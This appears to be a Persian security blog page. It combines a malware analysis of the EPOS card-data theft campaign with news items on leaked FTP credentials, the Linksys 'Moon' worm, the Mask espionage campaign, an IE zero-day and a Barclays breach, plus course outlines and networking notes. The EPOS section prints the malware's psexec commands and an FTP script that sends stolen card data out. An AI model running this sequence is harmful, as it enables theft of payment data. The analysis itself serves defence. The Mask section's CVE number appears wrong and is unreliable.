حملات EPOS Data Theft

EPOS Data Theft

نام بدافزار     EPOS Data Theft نوع بدافزار     Virus
تاریخ انتشار     2014/02/03 درجه اهمیت     کم

کارت خوانچيست؟

حملات جدیدی سامانه های الکترونیکی فروش (EPOS) را مورد تهدید قرار داده است. این حملات سامانه هایی را مورد هدف قرار می دهد که مسئولیت پردازش کارت های بانکی و اعتباری (Credit و Debit) را نیز برعهده دارند و باید اعتبار و موجودی کارت مشتری را دریافت و کنترل کنند. تمامی این سامانه های فروشگاهی از روش های رمزنگاری برای دریافت و ارسال اطلاعات کارت استفاده می کنند. با این حال اطلاعات کارت پس از دریافت باید در حافظه سیستم رمزگشایی و کنترل شود و دقیقاً در همین مرحله است که بدافزارهای کار گذاشته شده، اقدام به جمع آوری و سرقت اطلاعات می کنند.

در حملات نفوذی و سرقت اطلاعات از بدافزارهای نوع “درب مخفی” (Backdoor) و “سارق رمز عبور” (Password Stealer) و همچنین چندین ابزار دیگر مانند NetCat و PSEXEC استفاده می شود.

انتشار

در حال حاضر منبع اصلی حملات EPOS Data Theft کاملا مشخص نشده است. احتمالا با انتشار ایمیل های جعلی و فریب کاربران برای کلیک کردن روی پیوندهای مخرب در این ایمیل ها و همچنین با سوء استفاده از نقاط ضعف امنیتی و کسب دسترسی راه دور (Remote Access) به سیستم قربانیان خود، راه نفوذ باز شده و امکان نصب و فعالسازی بدافزارها فراهم می شود.

نامگذاری

نام بدافزارهایی که در حملات EPOS Data Theft مورد استفاده قرار می گیرند و تا به حال شناسایی شده اند، در زیر آمده است.

BackDoor-FBPP
PWS-FBOI
PWS-FBOJ
BackDoor-FBPL

خرابکاری

به منظور دسترسی به اطلاعات کارت ها، بدافزار بر روی سیستمی که عمل پردازش و کنترل کارتها را انجام می دهد، قرار می گیرد. سپس بدافزار تمامی پروسه های در حال اجرا بر روی سیستم را تحت نظر گرفته و منتظر اجرای دستورات مربوط به پردازش کارت می ماند. به محض اینکه بدافزار تشخیص دهد یک پردازش مالی در حال انجام است، داده های رمزگشایی شده را از حافظه کپی کرده و در یک فایل قرار می دهد. بدافزار این اطلاعات را به یک نشانی خاص ارسال می کند. 

در حملات نفوذی و سرقت اطلاعات از بدافزارهای نوع “درب مخفی” (Backdoor) و “سارق رمز عبور” (Password Stealer) و همچنین چندین ابزار دیگر مانند NetCat و PSEXEC استفاده می شود.  

EPOS Data Theft برای انجام یک حمله از چند سیستم به طور همزمان استفاده می کند. ابتدا بدافزاری که اقدام به جمع آوری اطلاعات کارتها می کند، بر روی سیستم پردازش کارتها نصب می شود. پس از سرقت، این اطلاعات در یک فایل به ظاهر از نوع DLL بصورت محلی بر روی سیستم آلوده نگهداری می شود. سپس این فایل بر روی سیستم دیگری که در همان شبکه قرار دارد کپی می گردد. همزمان بدافزاری که مسئولیت ارسال اطلاعات را برعهده دارد، بر روی یک سیستم دیگر نصب و فعال می گردد. این بدافزار وظیفه دارد تا تمام اطلاعاتی که بر روی سیستم دوم ذخیره شده را دریافت کرده و این اطلاعات را از طریق پودمان FTP به یک نشانی خارج از شبکه محلی ارسال نماید.  

نکته ی جالب در مورد این حملات، زمان بندی هوشیارانه آنها است. این حملات فقط در ساعات اداری بین ۱۰ صبح و ۵ بعدازظهر انجام می شوند تا ترافیک مربوط به این حملات در بین ترافیک عادی و روزمره شبکه مخفی مانده و باعث جلب توجه نشود.

در ادامه اطلاعات مربوط به بدافزارهایی که در این حمله مورد استفاده قرار گرفته اند، آورده شده است.

بدافزار PWS-FBOI:

این بدافزار خود را در قالب یک سرویس با نام POSWDS بر روی سیستم نصب می کند.

1

این سرویس بطور خودکار اجرا می شود و می تواند پروسه های خود را اجرا نموده و با میزکار (Desktop) در ارتباط باشد. مشخصات سرویس مذکور در تصویر زیر آمده است.

2

با توجه به کدگذاری سرویس این بدافزار، ظاهرا منشاء آن کشور روسیه است.

3

این بدافزار پروسه های در حال اجرای سیستم را کنترل نموده و به دنبال پروسه های پردازش کارتهای بانکی می گردد.

سپس بدافزار به محض پیدا کردن اطلاعات مربوط به پردازش مالی، داده های رمزگشایی شده را از حافظه برداشته و در یک فایل به ظاهر از نوع DLL در شاخه %SYSTEM% ذخیره می کند.

همچنین بدافزار، ساعت سیستم را کنترل می کند و در صورتی که ساعت بین ۱۰ صبح و ۵ بعدازظهر نباشد به مدت ۷ ساعت متوقف می شود و پس از ۷ ساعت مجددا ساعت را کنترل می کند. پس از این مرحله، بدافزار به یک نشانی IP در همان شبکه متصل شده و اطلاعات ذخیره شده را بر روی آن سیستم در شاخه <%SYSTEM%>\twain_32 در ساعات اداری کپی می کند.

این بدافزار امضای مخصوص خود را دارد که بصورت (KAPTOXA (Kar-Toe-Sha می باشد و نشانه ای از ارتباط آن با کشور روسیه است. 

5

تمامی دستورات مربوط به این بدافزار رمزنگاری شده هستند و هنگام نیاز در حافظه رمز گشایی می شوند.

6

بدافزار BackDoor-FBPL:

این بدافزار خود را در قالب یک سرویس با نام BladeLogic بر روی سیستم نصب می کند و با هر بار راه اندازی مجدد سیستم بصورت خودکار اجرا می شود.

7

۱- بدافزار پس از نصب دستورات زیر را اجرا میکند.

 C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p cmd /c “taskkill /IM bladelogic.exe /F”
 C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p -d bladelogic

2- این بدافزار نیز تنها در ساعات اداری فعالیت می کند تا در میان فعالیت های معمولی سیستم مخفی بماند.
۳- در ساعات مذکور دستورات زیر توسط بدافزار روی سیستم اجرا می شوند.

C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p cmd /c “taskkill /IM bladelogic.exe /F”
 C:\WINDOWS\system32\cmd.exe /c move \\\NT\.dll C:\Test\data_2014_1_16_15_15.txt

4- سپس داده های زیر در فایل Cmd.txt نوشته می شوند.

open


cd 001
bin
send C:\Test\data_2014_1_16_15_15.txt
quit

و دستور زیر اجرا می شود.

C:\WINDOWS\system32\cmd.exe /c ftp -s:C:\Test\cmd.txt > C:\Test\out.txt

5- سپس داده های زیر در فایل Cmd.txt نوشته می شوند:

open


cd etc
bin
send C:\Test\data_2014_1_16_15_15.txt
quit

و دستور زیر اجرا می شود:

C:\WINDOWS\system32\cmd.exe /c ftp -s:C:\Test\cmd.txt > C:\Test\out.txt

6- سپس بدافزار به خواب می رود (متوقف می شود) تا در بازه زمانی بعدی، مجددا مراحل ۴ تا ۶ را انجام دهد. تمامی دستورات بالا و اطلاعاتی که بدافزار استفاده می کند، رمزنگاری شده اند و هنگام نیاز در حافظه رمزگشایی می شوند. در تصویر زیر برخی از داده های رمزنگاری و رمزگشایی شده، نمایش داده شده است.

8

نشانی IP سیستمی که قرار است بدافزار PWS-FBOI اطلاعات سرقت شده را بر روی آن ذخیره کند و همچنین مشخصات پودمان FTP مورد استفاده سیستم، از قبل در داده های رمزنگاری شده بدافزار وجود دارند. این موضوع نشان می دهد که هر نمونه از این بدافزار مخصوص به یک حمله هدف گذاری شده و خاص می باشد.

بطور خلاصه، شکل زیر مراحل اجرای حملات EPOS Data Theft را نشان می دهد.

9

پيشگيری

به روز نگه داشتن ضدويروس و نصب تمامی اصلاحيه های سيستم عامل، در کنار آگاه کردن کاربران درخصوص خطر کليک بر روی پیوندهای ناآشنا و باز کردن هرزنامه ها، همگی می توانند خطر آلوده شدن به اين بدافزار و يـا گونه های مشابه را به حداقل برسانند.

افشای نام کاربری و رمز عبور هزاران سرور FTP

 

ftpفهرستی حاوی مجوزهای دسترسی به بیش از ۷ هزار سرور FTP در تالارهای گفتگوی زیرزمینی و بین نفوذگران منتشر شده است. در برخی موارد نفوذگران با اتصال به این سرورها، فایلهای آلوده از جمله اسکریپت های نوشته شده به زبان PHP را بر روی آنها کپی کرده اند. در موارد دیگر مشاهده شده است که نفوذگران با قرار دادن فایل هایی بر روی این سرورها از آنها برای تغییر جهت کاربران به سایت های مخرب استفاده نموده اند.

سرور FTP روزنامه The New York Times یکی از سرورهایی است که مجوز دسترسی به آن از طریق این فهرست به دست نفوذگران افتاده است. مسئولان این روزنامه اعلام کرده اند که در حال بررسی موضوع و رفع مشکلات ایجاد شده می باشند.

UNICEF سازمان دیگری است که مجوز دسترسی به سرورهای FTP آن، در فهرست نفوذگران مشاهده می شود. با این حال گفته می شود بخش FTP این سازمان که مدتهاست که از آن استفاده نمی شود، اکنون غیرفعال شده است. همچنین سخنگوی UNICEF اعلام کرده است که با توجه به ساختار امن این سازمان نفوذ به آن بسیار دور از انتظار خواهد بود.

هر چند که تمامی نام های کاربری و رمزهای عبور در فهرست معتبر نیستند اما بسیاری از آنها همچنان قابل استفاده می باشند. اکثر این رمزهای عبور پیچیده می باشند و بنابراین احتمال جمع آوری این اطلاعات با روش سعی و خطا (Brute-force) را می توان منتفی دانست. به نظر می رسد که این نام های کاربری و رمزهای عبور از طریق بدافزارهایی که بر روی سیستم های آلوده این سازمانها نصب بودند، جمع آوری شده اند.  

سرورهای FTP انباره های آنلاینی هستند که کاربران با وارد کردن نام کاربری و رمز عبور قادرند بر روی آنها فایل قرار داده یا از روی آنها فایل دریافت کنند. نرم افزار رایج برای دسترسی به این انباره ها، مرورگرها می باشند.

دسترسی به سرورهای FTP از طریق “ابر-پیوند”هایی که نام کاربری و و رمز عبور در آنها گنجانده شده باشد با یک کلیک امکان پذیر است. بنابراین نفوذگران با ایجاد ابر-پیوندهایی که به فایل های آلوده بر روی سرورهای مجاز اشاره می کنند و درج آنها در هرزنامه ها، کابران را فریب می دهند و یا وسوسه می کنند تا با کلیک بر روی پیوندها، فایل های مخرب را اجرا کنند. برای نمونه، در رویداد مربوط به The New York Times، نفوذگران با قرار دادن یک فایل HTML آلوده بر روی سرور آن روزنامه، اقدام به ایجاد ابر-پیوندی کرده بودند که در ظاهر به یکی از فایلهای روی سرور FTP اشاره می کرد؛ اما در واقعیت با کلیک بر روی آن سایت مخربی با تبلیغاتی تقلبی باز می شد.

ارسال فایل از سرورهای FTP به سرورهای وب که میزبانی سایت های اینترنتی را برعهده دارند، امری عادی است. لذا احتمال می رود که نفوذگران با دستکاری فایلهای ارسالی از سرورهای FTP، بتوانند محتوای سایت ها را هم تغییر دهند.

هنوز مشخص نیست چه شخص یا گروهی مسئول جمع آوری این فهرست بوده است.


مراقب روترهای آلوده Linksys باشید

یک بدافزار جدید با سوءاستفاده از نقطه ضعفی در بخش احراز هویت در روترهای شرکت Linksys توانسته به این تجهیزات نفوذ کرده و آنها را آلوده کند. روترهای سری E-Series هدف اصلی این بدافزار است. 

ابتدا کارشناسان موسسه SANS بودند که درباره رفتار غیرمتعارف روترهای E1000 و E1200 شرکت Linksys هشدار دادند. براساس مشاهدات این کارشناسان، روترها اقدام به اسکن نشانی های IP بر روی درگاه های ۸۰ و ۸۰۸۰ می کردند. تحقیقات بیشتر نشان داد بدافزار جدیدی که قادر به نفوذ به این روترها شده است، عامل اصلی این رفتار غیرعادی است. این بدافزار پس از رخنه به روترها از این تجهیزات برای شناسایی تجهیزات آسیب پذیر دیگر در شبکه سوءاستفاده می کرده است.  

برای این بدافزار جدید نام Moon انتخاب شده است. در برنامه این بدافزار علامت یک شرکت تخیلی به نام Lunar Industries از فیلم سینمایی The Moon مشاهده شده است.

بدافزار Moon ابتدا یک درخواست براساس پودمان HNAP یا Home Network Administration Protocol به نشانی های IP که اسکن کرده است، می فرستد. پودمان HNAP توسط شرکت Cisco ابداع شده و از آن برای شناسایی، تنظیم و مدیریت تجهیزات شبکه استفاده می شود.  

بدافزار Moon درخواست HNAP را می فرستد تا بتواند مدل روترهای دیگر را شناسایی کند و متوجه شود که آیا آن روترها آسیب پذیر هستند و آیا می توان از نقاط ضعف آنها برای نفوذ سوءاستفاده کرد یا خیر. در صورت مناسب تشخیص دادن یک روتر، بدافزار Moon یک درخواست دیگر به یک CGI Script فعال بر روی آن روتر می فرستد تا امکان اجرای فرمان های محلی بر روی دستگاه فراهم شود. با توجه به اینکه نقطه ضعف مورد سوء استفاده بدافزار Moon مربوط به بخش احراز هویت می شود، ماهیت دقیق این CGI Script منتشر نشده است. 

بدافزار Moon با سوءاستفاده از این نقطه ضعف یک فایل اجرایی با قالب ELF یا Executable And Linkable Format را بر روی روترهای آسیب پذیری که شناسایی کرده، دریافت و اجرا می کند. پس از آن، این روترها نیز شروع به جستجوی روترهای آسیب پذیر بیشتری می کنند.  

این فایل اجرایی ELF حاوی ۶۷۰ بازه از نشانی های IP است که عمدتا توسط شرکتهای سرویس دهنده اینترنت در کشورهای مختلف برای سرویس های Cable یا DSL استفاده می شوند.

در حال حاضر مشخص نیست که هدف بدافزار Moon به غیر از انتشار و آلودگی بیشتر روترهای Linksys، چیست. ارتباط این بدافزار با یک مرکز فرماندهی و کنترل می تواند علامتی از یک شبکه مخرب Botnet باشد که با استفاده از روترهای تسخیر شده (Bot) برای انجام عملیات مخرب هماهنگ و برنامه ریزی شده ای در آینده، تشکیل شده است.  

شرکت Linksys وجود نقطه ضعفی که توسط بدافزار Moon مورد سوءاستفاده قرار گرفته را تائید و اعلام کرده که به زودی اصلاحیه ای برای رفع آن منتشر خواهد کرد.

لازم به توضیح است که تنها بر روی روترهایی که برای مدیریت از راه دور تنظیم شده اند، امکان سوءاستفاده از نقطه ضعف و انتشار بدافزار Moon وجود دارد.

هر آنچه که درباره عملیات جاسوسی Mask باید بدانید

Maskmask نام عملیات جاسوسی گسترده ای است که از سال ۲۰۰۷ میلادی در جریان بوده است. عاملی که عملیات Mask را بااهمیت می کند، پیچیدگی ابزارهایی است که در این عملیات بکار گرفته شده است. ابزارهایی نظیر یک بدافزار پیشرفته، یک Rootkit و یک Bootkit که همگی دارای نسخه های اختصاصی برای Linux ،Mac OS X ،Windows و Android هستند. 

در ضمن، عملیات جاسوسی Mask، سیستم هایی را که از نسخه های قدیمی ضدویروس Kaspersky استفاده می کنند، هدف ویژه قرار داده و از یک نقطه ضعف در این ضدویروس برای مخفی کردن خود بر روی سیستم قربانی سود می برد. 

پیچیدگی و تنوع عملیاتی که Mask قادر به انجام آنها هست، این فرضیه را قوت می بخشد که یک دولت با امکانات فنی، مالی و انسانی گسترده پشت این عملیات جاسوسی بوده است.

map

چرا نام Mask؟

Mask ترجمه انگلیسی کلمه Careto در زبان اسپانیانی است. Careto به معنی ماسک یا چهره زشت است. کلمه Careto به دفعات در فایل های مختلف و مرتبط با این عملیات جاسوسی بکار رفته و قابل مشاهده است.

code

قربانیان عملیات Mask

سیستم هایی که مورد حمله و نفوذ Mask قرار گرفته اند، در حوزه های زیر شناسایی شده اند:

- نهادهای دولتی
- سفارتخانه ها
- شرکت ها و مراکز نفت، گاز و پتروشیمی
- مراکز تحقیقاتی
- شرکت های خصوصی مالی و سرمایه گذاری
- فعالان سیاسی و اجتماعی

آمار قربانیان Mask

گرچه آمار دقیق و کاملی در دسترس نیست ولی تاکنون بیش از یک هزار نشانی IP آلوده در ۳۱ کشور شناسایی شده است. از جمله این کشورها، می توان به الجزایر، آرژانتین، بلژیک، بولیوی، برزیل، چین، کوبا، مصر، فرانسه، آلمان، عراق، لیبی، مالزی، پاکستان، نروژ، سوئیس، ترکیه، انگلیس، آمریکا، ونزوئلا و همچنین ایران اشاره کرد.

یک هزار نشانی IP آلوده متعلق به ۳۸۰ مرکز، شرکت و موسسه می باشند.

chart

باید توجه داشت که این آمار از تعدادی سرور فرماندهی Mask که شناسایی شده اند و همچنین از تعدادی سرور فرماندهی دروغینی که توسط شرکت های امنیتی برای جمع آوری اطلاعات راه اندازی شده اند، به دست آمده است.  

Mask چکار می کند؟

آلودگی به Mask می تواند عواقب شدیدی به همراه داشته باشد. تمام ارتباطات سیستم آلوده کنترل و اطلاعات گوناگونی از سیستم آلوده جمع آوری می شود.

شناسایی فایل های مخرب و مرتبط با Mask به دلیل استفاده از فناوری های Rootkit بسیار دشوار است. همچنین علاوه بر ساختار اولیه Mask، گردانندگان این عملیات می توانند امکانات و تنظیمات جدیدی به Mask اضافه کنند تا مشخصات و رفتار Mask دائما در حال تغییر و دگرگونی باشد.  

نحوه آلودگی Mask 

بخش عمده آلودگی های مشاهده شده از طریق ایمیل های مخرب و هدفمند بوده است. این ایمیل ها برای هریک از قربانیان بطور اختصاصی ساخته شده اند تا کاملا واقعی و مرتبط با فعالیت های قربانی به نظر آید.  

در این ایمیل های جعلی، پیوند (Link) هایی وجود دارد که قربانی را به سایت های مخرب هدایت می کند. در این سایت ها از نقاط ضعف مختلف بر روی سیستم قربانی سوءاستفاده می شود تا بدافزار موردنظر به سیستم قربانی نفوذ کرده و بر روی آن فعال گردد. پس از آلوده شدن سیستم، قربانی به یک سایت خبری عادی و سالم و یا یک فیلم بر روی سایت YouTube هدایت می شود.

باید توجه داشت که سایت مخربی که قربانی به آن هدایت می شود، مستقیما برای نفوذ و آلودگی سیستم بکار گرفته نشده است. بلکه ابزارهای نفوذ در شاخه های خاصی از سایت یا حتی در سایت های زیرمجموعه (sub-domain) سایت اصلی قرار دارند. نشانی این شاخه ها و یا سایت های زیر مجموعه در هیچ کجا ذکر نشده اند و نشانی آنها فقط در پیوند داخل ایمیل وجود دارد.   

آیا Mask از نقاط ضعف امنیتی ناشناخته و جدید استفاده می کند؟

بر اساس اطلاعاتی که تاکنون به دست آمده، Mask از یک نقطه ضعف شناخته شده و قدیمی در نرم افزار Adobe Flash Player به دفعات برای نفوذ به سیستم قربانیان خود، سوءاستفاده کرده است.   

این نقطه ضعف که دارای شناسه CVE-2013-0773 است در نسخه های قدیمی تر از ۱۰٫۳ و ۱۱٫۲ در نرم افزار Flash Player وجود داشته است.

نکته بسیار جالب درباره این نقطه ضعف، نحوه کشف آن است. شرکت فرانسوی VUPEN در مسابقات نفوذ Pwn2Own که هرساله همزمان با کنفرانس امنیتی CanSecWest برگزار می شود، برای اولین بار از این نقطه ضعف برای دور زدن امکان امنیتی Sandbox در مرورگر Chrome استفاده کرد. در آن زمان، شرکت VUPEN از افشای جزئیات این نقطه ضعف خودداری کرد و اعلام نمود که این نقطه ضعف را به معرض فروش خواهد گذاشت. اکنون به نظر می رسد که گردانندگان Mask این نقطه ضعف را خریداری کرده اند.  

علاوه بر سوءاستفاده از نقطه ضعف Flash Player برای نفوذ به سیستم قربانی، از روش های فریبکارانه برای وسوسه و گمراه کردن قربانیان نیز استفاده شده است. نظیر ترغیب کاربر به دریافت و نصب فایل های به روز رسانی Java و یا دریافت و نصب افزونه (add-ons) جدید برای مرورگر Chrome.

Mask بر روی چه سیستم هایی عمل می کند؟

تاکنون نسخه هایی از بدافزارهای Mask برای محیط های Windows و Mac OS X مشاهده شده است. همچنین بر روی سرورهای فرماندهی Mask، افزونه هایی خاص محیط های Linux شناسایی شده اند ولی تاکنون این افزونه ها بر روی سیستم های آلوده مشاهده نشده اند. بعلاوه، در فایل های Log بر روی سرورهای فرماندهی نشانه هایی از فعالیت بر روی سیستم های Apple iOS و Android گزارش شده است. 

ادامه نوشته

یک سوم کاربران مرورگر IE در معرض خطر حملات نفوذی هستند

روز پنجشنبه ۲۴ بهمن ماه، شرکت مایکروسافت تائید کرد که نسخه های ۹ و ۱۰ مرورگر Internet Explorer هم اکنون تحت حملات نفوذی قرار دارند و نفوذگران از یک نقطه ضعف امنیتی جدید و تابحال ناشناخته برای حملات خود سوء استفاده می کنند. کاربران نسخه های ۹ و ۱۰ مرورگر IE بیش از یک سوم کاربران این مرورگر را تشکیل می دهند.

شرکت مایکروسافت ضمن تائید حملات نفوذی محدود علیه کاربران مرورگرهای IE9 و IE10 به آنان توصیه کرد تا هرچه زودتر اقدام به ارتقاء مرورگر خود به نسخه IE11 نمایند. البته کاربران سیستم عامل Vista قادر به انجام اینکار نبوده و همچنان مجبور به استفاده از نسخه آسیب پذیر IE9 خواهند بود. خوشبختانه کمتر از ۴ درصد کاربران Windows در جهان همچنان از نسخه Vista استفاده می کنند. راه حل دیگر برای این کاربران می تواند تغییر مرورگر خود از IE به مرورگرهایی نظیر Chrome و  Firefox باشد.

ابتدا شرکت امنیتی FireEye بود که حملات نفوذی از طریق این نقطه ضعف جدید و تابحال ناشناخته در مرورگر IE10 را گزارش کرد. به دنبال آن، شرکت امنیتی Websense نیز اعلام کرد که شواهدی در دست دارد که نشان می دهد این حملات از سه هفته پیش آغاز شده است. طبق اظهار Websense حملات اولیه عمدتاً علیه سایت “اتحادیه هوا و فضا فرانسه” صورت گرفته است.

کشف و سوء استفاده از این نقطه ضعف جدید به فاصله کمتر از دو روز پس از انتشار اصلاحیه حیاتی ماهانه برای مرورگر IE که ۲۴ نقطه ضعف مختلف را در این مرورگر برطرف میکند، برای مایکروسافت چندان خوشایند نیست. شرکت مایکروسافت هنوز راه حلی برای ترمیم این نقطه ضعف جدید یا روشی برای مقابله با سوءاستفاده از آن ارائه نکرده است. همچنین معلوم نیست که آیا مایکروسافت مجبور به انتشار اصلاحیه فوق العاده و خارج از برنامه ماهانه خود خواهد شد یا نزدیک به یک ماه صبر خواهد کرد تا در نوبت ماهانه بعد، اصلاحیه ای برای این نقطه ضعف منتشر کند.

اطلاعیه مهم ثبت نام دروس جدید ارایه شده و یا دروس تکمیل ظرفیت

کلیه دانشجویان می توانند جهت اطلاع از دروس جدید درخواستی و دروس تکمیل ظرفیت شده فایل پیوست زیر را دانلود نمایند و از روز سه شنبه مورخ 29/11/92 لغایت شنبه مورخ 3/12/92 جهت ثبت نام به واحد آموزش مراجعه نمایند.


لینک فایل حجم فایل
paper.pdf64.324 KB

نمرات درس رمزنگاری و امنیت سیستم ها آقای مهندس قربانیان هم آمد.


کلیه دانشجویان می توانند جهت اطلاع از برنامه زمانبندی دروس ارایه شده جدید فایل پیوست زیر را دانلود نمایند

لینک فایل حجم فایل
barname1392-93_2_13921127.xls168.000 KB


فراخوان و خواهش

از تمامی دوستان عزیز خواهش و استدعا دارم از این به بعد با نام اصلی خود نظرات را درج نمایند.

با توجه به مطالب و اینکه از نام های خود صرف نظر می نمایید لذا با توجه به این مطالب از این به بعد

مطالبی که نام نویسنده نظرات واقعی نباشد با عرض پوزش حذف می گردد.

من به عنوان کسی که مسئولیت مطالبی که خودم می گذرم را می پذیرم اما نظراتی که باعث

پایین آمدن شان دیگران از سوی کاربران عزیز و محترم شود را نمی پذیرم.

دوستان گرامی

امضای ما می تواند با درج نام ما نشاندهنده حق معنوی ما باشد.

سرقت اطلاعات حساب ۲۷,۰۰۰ مشتری بانک بارکلیز و فروش آنها


بانک معروف چند ملیتی انگلیسی ادعا می‌کند اطلاعات شخصی و مالی به سرقت رفته‌ی ۲۷۰۰۰ مشتری این بانک به دلالان فروخته شده است.

این مطلب روز یکشنبه توسط دیلی میل منتشر شده و اطلاعات جزئی (نمونه‌ای از فایل‌های دزدی) توسط افشاگری که قصد داشت مشتریان آسیب دیده را آگاه کند ارائه شده است.

رکوردهای به سرقت رفته حاوی نام مشتریان، تاریخ تولد، شماره بیمه ملی، آدرس، شماره تلفن، شماره پاسپورت، وضعیت اشتغال، شغل، حقوق، اطلاعات مشروح وضعیت مالی و همچنین اطلاعاتی در زمینه وضعیت سلامت و علایق شخصی آن‌ها است.

این افشاگر (یک دلال سابق کالا) می‌گوید هر رکورد قیمتی حدود ۵۰ پوند ( ۸۲ دلار) داشته و بسیاری از دلالان تصمیم به خرید تعدادی از فایل‌ها گرفته‌اند.

افشاگر از وجود این فایل‌ها در سپتامبر ۲۰۱۳ هنگامی که رئیس شرکت دلالی که برای آن کار می‌کرد از او خواست فایل‌ها را به قیمت ۸ پوند به ازای هر فایل به دیگر دلال‌ها به فروش رساند آگاه شد. ظاهرا، این شرکت از دسامبر ۲۰۱۲ شروع به استفاده از این فایل‌ها کرده، بنابراین این یک رخنه قدیمی است.

هنوز مشخص نیست رکوردها چگونه به سرقت رفته‌اند و احتمال آن‌که کار یک نیروی داخلی باشد وجود دارد. بانک تحقیقات خود را پس از انتشار این گزارش توسط دیلی میل آغاز کرد. عدم مشکوک شدن بانک به چنین رخداد امنیتی مهم و تبعات آن پس از گذشت مدت طولانی، غیر قابل باور است. جریان هر چه باشد، آن‌ها اکنون در حال تحقیقات هستند و پس از ارزیابی وضعیت سریعا با کمیساریای اطلاعات و دیگر تنظیم کننده‌ها تماس گرفته‌اند.

نتایج اولیه حاکی از آن است که اطلاعات به سرقت رفته متعلق به مشتریان مرتبط به برنامه‌ریزی مالی بانک که در سال ۲۰۱۱ پایان یافت، است.

مشتریان آسیب دیده به طور مستقیم از خطرات آگاه خواهند شد و سوال این است که بانک چقدر به دلیل عدم محافظت از اطلاعات جریمه خواهد شد و این چه تاثیری بر اعتماد مشتریان خواهد داشت

دوره ECSA



تست نفوذ و مفاهیم آن از جمله مواردی است که از دغدغه های شبکه های امروزی محسوب می گردد.

به طور خلاصه یک متخصص امنیت خود را در قالب یک نفوذ گر قرار داده و با استفاده از ابزارها و دانش خود تمامی نقاط ارتباطی شبکه را تحلیل می نماید در کل نتایج مشاهدات خود را در چهارچوب یک گزارش جامع ارائه کرده و راه حل های مورد نیاز را متذکر می گردد.

سر فصلهای این دوره :

1-The Need for Security Analysis
2-Advanced Googling
3-Advanced Sniffing Techniques
4-Vulnerability Analysis with Nessus
5-Snort Analysis
6-Penetration Testing Methodologies
7-Vulnerability Analysis
8-Penetration Testing Report and Documentation Writing

از یادآوری مطلب جناب آقای امیر مرادی کمال تشکر را دارم.

دوره نفوذ به شبکه در غالب یک هکر قانونمند

ceh

این دوره از معروفترین و پر طرفدار ترین دوره های امنیت می باشد در این دوره نفوذ به شبکه در غالب یک هکر قانونمند تعریف و بررسی شده و با دیدی گسترده تر حملات و تهدیدها شناسایی و موشکافی میگردد. دانشجویان در این دوره با ابزارهای متنوعی روبرو می شوند و با تست آنها درک مناسبی از آسیبهای رودررو در شبکه ها را پیدا می کنند.

سر فصلهای این دوره :

1-FOOTPRINTING & RECONNAISANCE
2-SCANNING
3-ENUMERATION
4-TROJANS AND BACKDOOR
5-SNIFFERS
6-SOCIAL ENGINEERING
7-SESSION HIJACK
8-SQL Injection
9-Evading IDS, Firewalls, and Honeypots
10- Buffer Overflow
11- Cryptography

معرفی دوره های امنیت

security

این دوره شامل مبانی اولیه در مبحث امنیت می باشد.

دانستن اطلاعات و اصطلا حات اولیه از جمله اهداف این دوره است.

در ابتدا مباحث تئوریک مورد بحث قرار گرفته و با تشریح لزوم امن بودن شبکه ها ادامه می یابد سپس حملات رایج در شبکه ها تشریح شده و انواع آن معرفی می گردد در این علم دانستن اصول اولیه شبکه از اهمیت بالایی برخوردار است .بدین جهت ارائه این دوره در ابتدا مطرح گردیده است.

سر فصلهای این دوره :

1-Network Design
2-Attacks
3-Application Security
4-Data Security
5-Access Control and Account Management
6-Public Key Infrastructure

مقايسه لایه های مدل OSI و مدل TCP/IP

به نقل از پایگاه پژوهشی پارس مدیر


چکيده

مدل مرجع OSI و مدل مرجع TCP/IP نقاط مشترك زیادی دارند. هر دوی آنها مبتنی بر مجموعه‌ای از پروتكل های مستقل هستند، و عملكرد لایه‌ها نیز تا حدی شبیه یكدیگر است. مدل OSI ثابت كرده كه بهترین ابزار برای توصیف شبكه‌های كامپیوتری است. اما پروتكل های TCP/IP در مقیاس وسیعی مورد استفاده قرار می‌گیرد. این دو مدل تفاوت هایی با هم دارند كه در زیر به برخی از آنها اشاره می كنیم:


  • در مدل TCP/IP تفاوت سرویس ها، واسط ها و پروتكل ها واضح و مشخص نمی‌باشد.
  • پروتكلهای OSI بهتر از TCP/IP مخفی شده است.
  • قبل از ایجاد مدل OSI پروتكلهای آن طراحی و ابداع شد. در نتیجه این مدل وابستگی و تعامل خاصی با هیچ مجموعه پروتكلی ندارد. اما در TCP/IP مسئله برعكس بود و این خود باعث شده كه مدل TCP/IP تنها برای شبكه‌های تحت خود مناسب باشد.
  • مدل OSI دارای هفت لایه است اما مدل TCP/IP، چهار لایه دارد و از لایه ارائه و لایه نشست خبری نیست.
  • لایه شبكه در مدل OSI اتصال گرا و غیر مستقیم است و لایه انتقال آن تنها اتصال گرا است اما در TCP/IP لایه شبكه الزاما غیر متصل و لایه انتقال آن اتصال گرا(TCP) یا غیر متصل(UDP) است.

ادامه نوشته

معرفی مركز عملیات امنیت شبكه (SOC)




 طرح مسئله
ترکيب تکنولوژي‌هاي مختلف با هدف برآورده نمودن نيازمندي‌هاي کسب و کار، سازمان را با چالش‌هايي جديد روبرو نموده است، چرا که عموماً هيچ روش يا مکانيزمي با هدف جمع آوري، نرمال سازي، مرتبط سازي و اولويت‌بندي ميليون‌ها رخداد گزارش شده از سوي تکنولوژي‌ها و سامانه‌هاي مختلف وجود ندارد. در چنين وضعيتي استفاده از تکنولوژي‌هاي مختلف و نامتجانس جز افزايش سربار فعاليت‌هاي امنيتي سازمان، مضاعف شدن اين فعاليت‌ها، ايجاد مدل‌هاي امنيتي ضعيف و عدم موفقيت فرايندهاي مميزي، نتيجه‌اي به همراه نخواهد داشت.
در چنين وضعيتي، مرتبط¬سازي بلادرنگ وقايع مختلف (که توسط تجهيزات و ابزارهاي مختلفي توليد شده‌است) و شناسايي يک حمله يا نفوذ مشخص، بسيار مشکل و عموما غيرممکن مي‌باشد. علاوه بر اين، تحليل‌هاي پس از وقوع حوادث نيز بسيار کند انجام خواهند شد چرا که ترکيب اطلاعاتي که به روش‌هاي متفاوت در ابزارها و تجهيزات مختلف نگهداري مي‌شوند، کاري بسيار زمان بر و پرهزينه است و سوالات زير در اين خصوص مطرح مي¬گردد:
•    چگونه مي¬توان ميليون‌ها واقعه‌اي که روزانه توسط سيستم‌ها، نرم¬افزار‌هاي کاربردي و کانال‌هاي کسب و کار مختلف توليد مي‌شوند را جمع¬آوري، نرمال و به يکديگر مرتبط ساخت؟
•    چگونه اين وقايع را مي¬توان اولويت‌بندي کرد؟
